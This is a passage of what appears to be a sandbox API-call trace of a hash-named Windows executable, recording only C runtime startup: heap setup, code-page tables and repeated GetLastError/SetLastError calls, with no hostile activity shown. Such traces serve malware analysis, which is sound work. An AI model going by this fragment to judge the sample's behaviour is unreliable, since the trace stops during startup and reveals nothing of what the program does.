mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Thread: id = 1 os_tid = 0x4d4 [0135.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff64 | out: lpSystemTimeAsFileTime=0x19ff64*(dwLowDateTime=0x3dedf1ad, dwHighDateTime=0x1d95b24)) [0135.015] GetCurrentProcessId () returned 0x1604 [0135.015] GetCurrentThreadId () returned 0x4d4 [0135.015] GetTickCount () returned 0x1e549e3 [0135.015] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff5c | out: lpPerformanceCount=0x19ff5c*=3195905132790) returned 1 [0135.153] GetStartupInfoW (in: lpStartupInfo=0x19ff08 | out: lpStartupInfo=0x19ff08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\OqXZRaykm\\Desktop\\a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x19ff6c, hStdOutput=0x19ff6c, hStdError=0x4057d6)) [0135.153] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0135.153] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2220000 [0135.155] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77130000 [0135.155] GetProcAddress (hModule=0x77130000, lpProcName="FlsAlloc") returned 0x77151d80 [0135.155] GetProcAddress (hModule=0x77130000, lpProcName="FlsGetValue") returned 0x7714e6d0 [0135.155] GetProcAddress (hModule=0x77130000, lpProcName="FlsSetValue") returned 0x77151140 [0135.156] GetProcAddress (hModule=0x77130000, lpProcName="FlsFree") returned 0x77151fb0 [0135.156] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x214) returned 0x22205b8 [0135.157] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77130000 [0135.157] GetCurrentThreadId () returned 0x4d4 [0135.157] GetStartupInfoW (in: lpStartupInfo=0x19fea4 | out: lpStartupInfo=0x19fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\OqXZRaykm\\Desktop\\a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4053fd, hStdOutput=0x405736, hStdError=0x22205b8)) [0135.157] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x8, Size=0x800) returned 0x22207d8 [0135.157] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0135.158] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0135.158] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0135.158] SetHandleCount (uNumber=0x20) returned 0x20 [0135.158] GetCommandLineA () returned="\"C:\\Users\\OqXZRaykm\\Desktop\\a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7.exe\" " [0135.158] GetEnvironmentStringsW () returned 0x608728* [0135.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1566, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1566 [0135.158] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x0, Size=0x61e) returned 0x2220fe8 [0135.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1566, lpMultiByteStr=0x2220fe8, cbMultiByte=1566, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1566 [0135.159] FreeEnvironmentStringsW (penv=0x608728) returned 1 [0135.159] GetLastError () returned 0xcb [0135.159] SetLastError (dwErrCode=0xcb) [0135.159] GetLastError () returned 0xcb [0135.159] SetLastError (dwErrCode=0xcb) [0135.159] GetLastError () returned 0xcb [0135.159] SetLastError (dwErrCode=0xcb) [0135.159] GetACP () returned 0x4e4 [0135.159] RtlAllocateHeap (HeapHandle=0x2220000, Flags=0x0, Size=0x220) returned 0x2221610 [0135.160] GetLastError () returned 0xcb [0135.160] SetLastError (dwErrCode=0xcb) [0135.160] IsValidCodePage (CodePage=0x4e4) returned 1 [0135.160] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe6c | out: lpCPInfo=0x19fe6c) returned 1 [0135.160] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f938 | out: lpCPInfo=0x19f938) returned 1 [0135.160] GetLastError () returned 0xcb [0135.160] SetLastError (dwErrCode=0xcb) [0135.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd4c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0135.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd4c, cbMultiByte=256, lpWideCharStr=0x19f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ讔@Ā") returned 256 [0135.160] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ讔@Ā", cchSrc=256, lpCharType=0x19f94c | out: lpCharType=0x19f94c) returned 1 [0135.160] GetLastError () returned 0xcb [0135.160] SetLastError (dwErrCode=0xcb) [0135.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd4c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0135.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd4c, cbMultiByte=256, lpWideCharStr=0x19f688, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0135.160] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0135.160] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f478, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0135.160] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x19fc4c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿôE\x02'\x84þ\x19", lpUsedDefaultChar=0x0) returned 256 [0135.160] GetLastError () returned 0xcb [0135.161] SetLastError (dwErrCode=0xcb) [0135.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd4c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0135.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd4c, cbMultiByte=256, lpWideCharStr=0x19f6a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0135.161] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0135.161] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f498, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0135.161] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x19fb4c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿôE\x02'\x84þ\x19", lpUsedDefaultChar=0x0) returned 256 [0135.161] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4207a0, nSize=0x104 | out: lpFilename="C:\\Users\\OqXZRaykm\\Desktop\\a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7.exe" (normalized: "c:\\users\\oqxzraykm\\desktop\\a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7.exe")) returned 0x5f [0135.161] GetLastError () returned 0x0 [0135.161] SetLastError (dwErrCode=0x0) [0135.161] GetLastError () returned 0x0 [0135.161] SetLastError (dwErrCode=0x0) [0135.161] GetLastError () returned 0x0 [0135.162] SetLastError (dwErrCode=0x0) [0135.162] GetLastError () returned 0x0 [0135.162] SetLastError (dwErrCode=0x0) [0135.162] GetLastError () returned 0x0 [0135.162] SetLastError (dwErrCode=0x0) [0135.162] GetLastError () returned 0x0 [0135.163] SetLastError (dwErrCode=0x0) [0135.163] GetLastError () returned 0x0 [0135.163] SetLastError (dwErrCode=0x0) [0135.163] GetLastError () returned 0x0 [0135.163] SetLastError (dwErrCode=0x0) [0135.163] GetLastError () returned 0x0 [0135.163] SetLastError (dwErrCode=0x0) [0135.163] GetLastError () returned 0x0 [0135.163] SetLastError (dwErrCode=0x0) [0135.163] GetLastError () returned 0x0 [0135.163] SetLastError (dwErrCode=0x0) [0135.163] GetLastError () returned 0x0 [0135.164] SetLastError (dwErrCode=0x0) [0135.164] GetLastError () returned 0x0 [0135.164] SetLastError (dwErrCode=0x0) [0135.164] GetLastError () returned 0x0 [0135.164] SetLastError (dwErrCode=0x0) [0135.164] GetLastError () returned 0x0 [0135.164] SetLastError (dwErrCode=0x0) [0135.164] GetLastError () returned 0x0 [0135.164] SetLastError (dwErrCode=0x0) [0135.164] GetLastError () returned 0x0 [0135.164] SetLastError (dwErrCode=0x0) [0135.164] GetLastError () returned 0x0 [0135.165] SetLastError (dwErrCode=0x0) [0135.165] GetLastError () returned 0x0 [0135.165] SetLastError (dwErrCode=0x0) [0135.165] GetLastError () returned 0x0 [0135.165] SetLastError (dwErrCode=0x0) [0135.165] GetLastError () returned 0x0 [0135.165] SetLastError (dwErrCode=0x0) [0135.165] GetLastError () returned 0x0 [0135.165] SetLastError (dwErrCode=0x0) [0135.165] GetLastError () returned 0x0 [0135.165] SetLastError (dwErrCode=0x0) [0135.165] GetLastError () returned 0x0 [0135.165] SetLastError (dwErrCode=0x0) [0135.165] GetLastError () returned 0x0 [0135.165] SetLastError (dwErrCode=0x0) [0135.166] GetLastError () returned 0x0 [0135.166] SetLastError (dwErrCode=0x0) [0135.166] GetLastError () returned 0x0 [0135.166] SetLastError (dwErrCode=0x0) [0135.166] GetLastError () returned 0x0 [0135.166] SetLastError (dwErrCode=0x0) [0135.166] GetLastError () returned 0x0 [0135.166] SetLastError (dwErrCode=0x0) [0135.166] GetLastError () returned 0x0 [0135.166] SetLastError (dwErrCode=0x0) [0135.166] GetLastError () returned 0x0 [0135.166] SetLastError (dwErrCode=0x0) [0135.166] GetLastError () returned 0x0 [0135.166] SetLastError (dwErrCode=0x0) [0135.166] GetLastError () returned 0x0 [0135.166] SetLastError (dwErrCode=0x0) [0135.167] GetLastError () returned 0x0 [0135.167] SetLastError (dwErrCode=0x0) [0135.167] GetLastError () returned 0x0 [0135.167] SetLastError (dwErrCode=0x0) [0135.167] GetLastError () returned 0x0 [0135.167] SetLastError (dwErrCode=0x0) [0135.167] GetLastError () returned 0x0 [0135.167] SetLastError (dwErrCode=0x0) [0135.167] GetLastError () returned 0x0 [0135.167] SetLastError (dwErrCode=0x0) [0135.167] GetLastError () returned 0x0 [0135.167] SetLastError (dwErrCode=0x0) [0135.167] GetLastError () returned 0x0 [0135.167] SetLastError (dwErrCode=0x0) [0135.167] GetLastError () returned 0x0 [0135.168] SetLastError (dwErrCode=0x0) [0135.168] GetLastError () returned 0x0 [0135.168] SetLastError (dwErrCode=0x0) [0135.168] GetLastError () returned 0x0 [0135.168] SetLastError (dwErrCode=0x0) [0135.168] GetLastError () returned 0x0 [0135.168] SetLastError (dwErrCode=0x0) [0135.168] GetLastError () returned 0x0 [0135.168] SetLastError (dwErrCode=0x0) [0135.168] GetLastError () returned 0x0 [0135.168] SetLastError (dwErrCode=0x0) [0135.168] GetLastError () returned 0x0 [0135.168] SetLastError (dwErrCode=0x0) [0135.168] GetLastError () returned 0x0 [0135.168] SetLastError (dwErrCode=0x0) [0135.168] GetLastError () returned 0x0 [0135.169] SetLastError (dwErrCode=0x0) [0135.169] GetLastError () returned 0x0 [0135.169] SetLastError (dwErrCode=0x0) [0135.169] GetLastError () returned 0x0 [0135.169] SetLastError (dwErrCode=0x0) [0135.169] GetLastError () returned 0x0 [0135.169] SetLastError (dwErrCode=0x0) [0135.169] GetLastError () returned 0x0 [0135.169] SetLastError (dwErrCode=0x0) [0135.169] GetLastError () returned 0x0 [0135.169] SetLastError (dwErrCode=0x0) [0135.169] GetLastError () returned 0x0 [0135.169] SetLastError (dwErrCode=0x0) [0135.169] GetLastError () returned 0x0 [0135.169] SetLastError (dwErrCode=0x0) [0135.169] GetLastError () returned 0x0 [0135.170] SetLastError (dwErrCode=0x0) [0135.170] GetLastError () returned 0x0 [0135.170] SetLastError (dwErrCode=0x0) [0135.170] GetLastError () returned 0x0 [0135.170] SetLastError (dwErrCode=0x0) [0135.170] GetLastError () returned 0x0 [0135.170] SetLastError (dwErrCode=0x0) [0135.170] GetLastError () returned 0x0 [0135.170] SetLastError (dwErrCode=0x0) [0135.170] GetLastError () returned 0x0 [0135.170] SetLastError (dwErrCode=0x0) [0135.170] GetLastError () returned 0x0 [0135.170] SetLastError (dwErrCode=0x0) [0135.170] GetLastError () returned 0x0 [0135.170] SetLastError (dwErrCode=0x0) [0135.170] GetLastError () returned 0x0 [0135.171] SetLastError (dwErrCode=0x0) [0135.171] GetLastError () returned 0x0 [0135.171] SetLastError (dwErrCode=0x0) [0135.171] GetLastError () returned 0x0 [0135.171] SetLastError (dwErrCode=0x0) [0135.171] GetLastError () returned 0x0 [0135.171] SetLastError (dwErrCode=0x0) [0135.171] GetLastError () returned 0x0 [0135.171] SetLastError (dwErrCode=0x0) [0135.171] GetLastError () returned 0x0 [0135.171] SetLastError (dwErrCode=0x0) [0135.171] GetLastError () returned 0x0 [0135.171] SetLastError (dwErrCode=0x0) [0135.171] GetLastError () returned 0x0 [0135.172] SetLastError (dwErrCode=0x0) [0135.172] GetLastError () returned 0x0 [0135.172] SetLastError (dwErrCode=0x0) [0135.172] GetLastError () returned 0x0 [0135.172] SetLastError (dwErrCode=0x0) [0135.172] GetLastError () returned 0x0 [0135.172] SetLastError (dwErrCode=0x0) [0135.172] GetLastError () returned 0x0 [0135.172] SetLastError (dwErrCode=0x0) [0135.172] GetLastError () returned 0x0 [0135.172] SetLastError (dwErrCode=0x0) [0135.172] GetLastError () returned 0x0 [0135.172] SetLastError (dwErrCode=0x0) [0135.172] GetLastError () returned 0x0 [0135.172] SetLastError (dwErrCode=0x0) [0135.172] GetLastError () returned 0x0 [0135.173] SetLastError (dwErrCode=0x0) [0135.173] GetLastError () returned 0x0 [0135.173] SetLastError (dwErrCode=0x0) [0135.173] GetLastError () returned 0x0 [0135.173] SetLastError (dwErrCode=0x0) [0135.173] GetLastError () returned 0x0 [0135.173] SetLastError (dwErrCode=0x0) [0135.173] GetLastError () returned 0x0 [0135.173] SetLastError (dwErrCode=0x0) [0135.173] GetLastError () returned 0x0 [0135.173] SetLastError (dwErrCode=0x0) [0135.173] GetLastError () returned 0x0 [0135.173] SetLastError (dwErrCode=0x0) 